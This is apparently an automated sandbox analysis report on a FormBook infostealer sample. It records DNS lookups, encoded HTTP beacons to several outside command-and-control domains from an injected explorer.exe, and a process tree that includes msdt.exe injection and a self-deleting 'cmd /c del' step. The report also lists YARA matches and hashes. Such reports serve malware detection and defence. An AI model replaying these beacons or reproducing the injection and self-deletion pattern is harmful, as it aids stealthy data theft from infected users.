Aug 3, 2021 18:26:37.297532082 CEST	8.8.8.8	192.168.2.5	0x746e	No error (0)	parkingpage.namecheap.com		198.54.117.215	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:42.924705029 CEST	8.8.8.8	192.168.2.5	0x49f2	No error (0)	www.leonardocarrillo.com		172.107.55.6	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:48.414810896 CEST	8.8.8.8	192.168.2.5	0xb99d	No error (0)	www.hazard-protection.com		148.59.128.71	A (IP address)	IN (0x0001)
Aug 3, 2021 18:26:53.749840975 CEST	8.8.8.8	192.168.2.5	0xfef8	No error (0)	www.mercuryaid.net	mercuryaid.net		CNAME (Canonical name)	IN (0x0001)
Aug 3, 2021 18:26:53.749840975 CEST	8.8.8.8	192.168.2.5	0xfef8	No error (0)	mercuryaid.net		223.29.234.230	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.vectoroutlines.com

www.3cheer.com

www.boogerstv.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49726	198.54.126.105	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:26:15.542488098 CEST	4735	OUT	GET /p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB HTTP/1.1 Host: www.vectoroutlines.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:26:15.712918043 CEST	4736	IN	HTTP/1.1 301 Moved Permanently content-type: text/html content-length: 707 date: Tue, 03 Aug 2021 16:26:15 GMT server: LiteSpeed location: https://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB x-turbo-charged-by: LiteSpeed connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49729	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:26:20.797106028 CEST	4754	OUT	GET /p2io/?BJ=hDwxgnCxHqZG/nBf9NFToL98ekU0apx9FaMqifAGLuP7v/j66cUXhxpzlnLclYHrbOLF&b2Ml9=0txtgJLXY6ULB HTTP/1.1 Host: www.3cheer.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Aug 3, 2021 18:26:20.911098003 CEST	4755	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 03 Aug 2021 16:26:20 GMT Content-Type: text/html Content-Length: 275 ETag: "6104831f-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49730	198.54.117.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 3, 2021 18:26:37.492023945 CEST	4756	OUT	GET /p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB HTTP/1.1 Host: www.boogerstv.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: V5cfxBHd71.exe PID: 5700 Parent PID: 5636

General

Start time:	18:24:35
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\V5cfxBHd71.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\V5cfxBHd71.exe'
Imagebase:	0xea0000
File size:	793600 bytes
MD5 hash:	182170393A1ACD19744575F00562384F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: V5cfxBHd71.exe PID: 6092 Parent PID: 5700

General

Start time:	18:24:47
Start date:	03/08/2021
Path:	C:\Users\user\Desktop\V5cfxBHd71.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\V5cfxBHd71.exe
Imagebase:	0x4d0000
File size:	793600 bytes
MD5 hash:	182170393A1ACD19744575F00562384F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3472 Parent PID: 6092

General

Start time:	18:24:49
Start date:	03/08/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff693d90000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: msdt.exe PID: 3332 Parent PID: 6092

General

Start time:	18:25:31
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\msdt.exe
Imagebase:	0x1290000
File size:	1508352 bytes
MD5 hash:	7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 340 Parent PID: 3332

General

Start time:	18:25:33
Start date:	03/08/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1496 Parent PID: 340

General

Start time:	18:25:34
Start date:	03/08/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: V5cfxBHd71.exe PID: 5700 Parent PID: 5636 V5cfxBHd71.exeCOMMON

Executed Functions

Function 030ADB29, Relevance: 1.7, APIs: 1, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15187bb6ce345da25b0b1ca1afdc3c8557d998d3cb6fd5842d7c8e924a3817f3
Instruction ID: f4d4d791e09844c22f3e4ecb5aef5d297e501ac813415d5aca75c66856fc8c02
Opcode Fuzzy Hash: 15187bb6ce345da25b0b1ca1afdc3c8557d998d3cb6fd5842d7c8e924a3817f3
Instruction Fuzzy Hash: 4A916B71D09388EFCF12CFA8D854ADDBFB1AF4A300F19809AE448AB262D3759845DF51

Uniqueness

Uniqueness Score: -1.00%

Function 030ABBC8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f44c629fd0ecbd98732069a94692626b478ce4aab3f676cd699e2c6f86abe719
Instruction ID: 2ca8264791ed3c8e808d0949e36e3f25f207f4005d0487596c5d645af5024649
Opcode Fuzzy Hash: f44c629fd0ecbd98732069a94692626b478ce4aab3f676cd699e2c6f86abe719
Instruction Fuzzy Hash: E5716770A01B059FD764DFAAD040B9AB7F1FF88204F04892DD54ADBA40EB35E945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 030AB1F8, Relevance: 1.6, APIs: 1, Instructions: 144COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 030ADD8A

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: f520702457208e490e0fe7146b19d5bd7c9a00688e15341b6a484cc395db4b63
Instruction ID: bd2eb2c67a14e4f208c5460e49ec5a17af553af1eff3abba38569903d0a934df
Opcode Fuzzy Hash: f520702457208e490e0fe7146b19d5bd7c9a00688e15341b6a484cc395db4b63
Instruction Fuzzy Hash: 5B5120B0C05348AFDB11CFE9D890ADEBBF1BF48310F29856AE815AB251D7749845CF91

Uniqueness

Uniqueness Score: -1.00%

Function 030AB214, Relevance: 1.6, APIs: 1, Instructions: 116COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 030ADD8A

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: c966431cd3e83279e60f6e7ec0e75296e440997102e0950ddcc6e62aaedda90c
Instruction ID: 34974d9a38e800adb9de1a9044ce7a14e9b6d89865c23e987e78b0a0601b422a
Opcode Fuzzy Hash: c966431cd3e83279e60f6e7ec0e75296e440997102e0950ddcc6e62aaedda90c
Instruction Fuzzy Hash: 6351CDB1D11309EFDB14CFE9D884ADEBBB5BF48310F24852AE819AB210D7749845CF90

Uniqueness

Uniqueness Score: -1.00%

Function 030A6D41, Relevance: 1.6, APIs: 1, Instructions: 103COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030A6D7E,?,?,?,?,?), ref: 030A6E3F

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 83adf4a471dddfb0f27ebec6f179ff7f184612118577807358ba56935b0f44cd
Instruction ID: e859c2a0a7e51c9d7f3a93967fabdc43c6dc8ff8994721ca2de1e8c6ee6a32e1
Opcode Fuzzy Hash: 83adf4a471dddfb0f27ebec6f179ff7f184612118577807358ba56935b0f44cd
Instruction Fuzzy Hash: 33415B76900248AFDF11CF99D844AEEBFF9FB49320F19801AE914A7220D7369954DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 030A6E77, Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030A6D7E,?,?,?,?,?), ref: 030A6E3F

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 1b97c7b23b15e5bb8a33314ee5460ccc49afbeea1938ea0f5ae2c706d7ca877a
Instruction ID: 96d9b3ddde4ba4b487949e1fe34ab392ca7f1f8ca04eaeb99083439fc326be0d
Opcode Fuzzy Hash: 1b97c7b23b15e5bb8a33314ee5460ccc49afbeea1938ea0f5ae2c706d7ca877a
Instruction Fuzzy Hash: 583169B8A62340AFE700CB64E45A76A7FB1F789301F18C12AF90197381DF385840EF12

Uniqueness

Uniqueness Score: -1.00%

Function 030A6924, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030A6D7E,?,?,?,?,?), ref: 030A6E3F

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 09653499684340ae9e9ded883aba23b4c57627d72b0f1947850e522f6464b5de
Instruction ID: 235dfc05d25a2e7df46e89b4676ba8a77566d1e871e53000248fc04d355b9ae2
Opcode Fuzzy Hash: 09653499684340ae9e9ded883aba23b4c57627d72b0f1947850e522f6464b5de
Instruction Fuzzy Hash: 9821E4B5901208AFDB10CFA9D884BEEBBF8FB48324F14841AE914B7310D375A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 030A6DB0, Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,030A6D7E,?,?,?,?,?), ref: 030A6E3F

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 3a05d8bbc1448f8f399a15675ecdb9a6e67b61da79ef0e3f4d0ebf4dcbe58a1b
Instruction ID: 68ed853b56f6d3713dbe58a3ef867a98cff16daca2a5b459107b0df0e50a4227
Opcode Fuzzy Hash: 3a05d8bbc1448f8f399a15675ecdb9a6e67b61da79ef0e3f4d0ebf4dcbe58a1b
Instruction Fuzzy Hash: 2621E3B5901209AFDB10CFA9D984BDEBBF8FB48324F14841AE914B7310D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 030AB0D8, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030ABE89,00000800,00000000,00000000), ref: 030AC09A

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 25b213fb06f12a59516aa93b97afcf063a7c17a734496b4cc48a1754ce83b1c4
Instruction ID: 70cf0630697a6c540da6917300f15a94ecef6d1b6a8f8d29e03d19620345b4cf
Opcode Fuzzy Hash: 25b213fb06f12a59516aa93b97afcf063a7c17a734496b4cc48a1754ce83b1c4
Instruction Fuzzy Hash: D21142B28006089FDB20CFAAD444BDEFBF4EB88324F05842AE815B7200C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 030AC028, Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,030ABE89,00000800,00000000,00000000), ref: 030AC09A

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f22a03b27bcacf75e22e34a5b6f86d27a1f6475e6923a78fa48cec35c5121362
Instruction ID: f358c5f9ccc41e0ad67377aa72f3b93640d56c27316f6d56f90f5142341a08e2
Opcode Fuzzy Hash: f22a03b27bcacf75e22e34a5b6f86d27a1f6475e6923a78fa48cec35c5121362
Instruction Fuzzy Hash: 6A1103B69002099FDB20CFAAD448BDEFBF4AB58314F15852AD415B7200C375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 030AB080, Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,030ABBDB), ref: 030ABE0E

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 09dca9d543e4b0762289c3108d49b2906ab09081704ae9b7c13669b2cf8c7130
Instruction ID: a634596c9544ed19a18bed4007b409f866c139b017a91f5d06ae7110dce72d2b
Opcode Fuzzy Hash: 09dca9d543e4b0762289c3108d49b2906ab09081704ae9b7c13669b2cf8c7130
Instruction Fuzzy Hash: E71102B5C016498FDB20CF9AD444BDEFBF4EF88224F14842AD919B7200D374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 030AB24C, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?,?,?,?,?,?,030ADEA8,?,?,?,?), ref: 030ADF1D

Memory Dump Source

Source File: 00000000.00000002.257907994.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: false

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: 73eae184eb20d0c36078100018fdcacebb11a9c22aa6a0d25161343d171a7b1c
Instruction ID: 6e3175bbaf8ea12de9345ca4f88a9bd550e043bc1ef5c4c0d795255ff3fa8bf4
Opcode Fuzzy Hash: 73eae184eb20d0c36078100018fdcacebb11a9c22aa6a0d25161343d171a7b1c
Instruction Fuzzy Hash: 691100B58006099FDB20DF99D488BEFBBF8EB58324F14841AE915B7700D374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0182D4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257687062.000000000182D000.00000040.00000001.sdmp, Offset: 0182D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17bf00735d8306b8c953a3a2066ef85915181281dedd1603adf7ed2deb9a3f0
Instruction ID: 56d170c4d0487142d59c32b0660beb302658a771e700281e088eb1942bb69ede
Opcode Fuzzy Hash: e17bf00735d8306b8c953a3a2066ef85915181281dedd1603adf7ed2deb9a3f0
Instruction Fuzzy Hash: BE213AB1504244DFDB02CF54DAC0B26BFA5FB8832CF24C669F9058B246C376D996C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0183D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257719122.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a487f173188c998613bad7a24827fdee061573afa3744eae14efd60b4b5b9b0
Instruction ID: 059307f44db2cf874843c44440cba6cc107bcf1343fc0dbc8297a128537e874b
Opcode Fuzzy Hash: 5a487f173188c998613bad7a24827fdee061573afa3744eae14efd60b4b5b9b0
Instruction Fuzzy Hash: D2213771504204DFDB01DF94C5C0B26BB61FBC4328F28C6ADE9098B246C336E956CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257719122.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0f8fb6351ae560c1fa9c539c6c5f777b17735a331ded0ff54ac478a19bee9af
Instruction ID: c20530488ad58f8e5eb8d03fb4a9aa3c2bfa34048b99f2995ecffce95d87adab
Opcode Fuzzy Hash: d0f8fb6351ae560c1fa9c539c6c5f777b17735a331ded0ff54ac478a19bee9af
Instruction Fuzzy Hash: CD2145B1508204DFCB10CF64D5D0B26FB61FB84758F68C669E8098B246C33AD847CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0182D4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257687062.000000000182D000.00000040.00000001.sdmp, Offset: 0182D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69d7024cdfcefd926ead02efcbb901b97aad1906707df055ccf3b322d20e9c3
Instruction ID: e089c1812d2565f4f89014e5d1aba0a2c5d9070e8e33680c2d1df3862d6b2818
Opcode Fuzzy Hash: f69d7024cdfcefd926ead02efcbb901b97aad1906707df055ccf3b322d20e9c3
Instruction Fuzzy Hash: 6E11D376404280DFDB12CF54D6C4B16BF71FB84324F28C6A9E8054B657C33AD596CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0183D017, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.257719122.000000000183D000.00000040.00000001.sdmp, Offset: 0183D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
Instruction ID: 6532669ac531c426851f0d561319443dabe010e3b95c329316f44b6c174eb80f
Opcode Fuzzy Hash: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
Instruction Fuzzy Hash: F611EB75404280CFCB02CF14D5D0B16FBA1FB84324F28C6AAD8098B656C33AD45BCBA2

Uniqueness

Uniqueness Score: -1.00%

